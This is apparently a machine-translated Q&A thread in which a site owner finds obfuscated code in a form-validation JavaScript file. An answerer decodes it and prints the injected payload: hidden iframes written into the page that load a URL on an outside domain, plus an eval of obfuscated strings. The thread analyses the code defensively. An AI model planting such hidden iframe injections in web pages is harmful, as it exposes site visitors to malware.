我的javascript文件中发现了什么奇怪的代码?

Ben*_*Ben 3 javascript virus

我的一个表单验证文件,我发现以下代码(见下文)我的朋友在扫描我的网站时指出它,说它是病毒.

但究竟是什么呢?

http://pastebin.com/P8KBm0xk

Ber*_*rgi 5

一种病毒.我在数组文字中包含一些带有Unicode转义字符的字符串,第一个是html,第二个是html "write".然后,document[arr[1]](arr[0])执行,转换为以下内容:

document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
Run Code Online (Sandbox Code Playgroud)

我不知道(也不会检查)这些iframe包含的内容,可能会有一些漏洞利用.

此外,代码确实包含(在这两个iframe写入之间)一些函数(_1lOO0l)可能IlO在它被eval编辑之前解除字符串(是的,eval是邪恶的!:-),但是你的pastebin前面有一些丢失的代码片段,所以我不能告诉你他们到底做了什么.你能给我们整个剧本吗?

  • 您可以查看链接是已知还是可疑的恶意软件.例如:http://www.google.com/safebrowsing/diagnostic?site = magda.georgewkohn.com (2认同)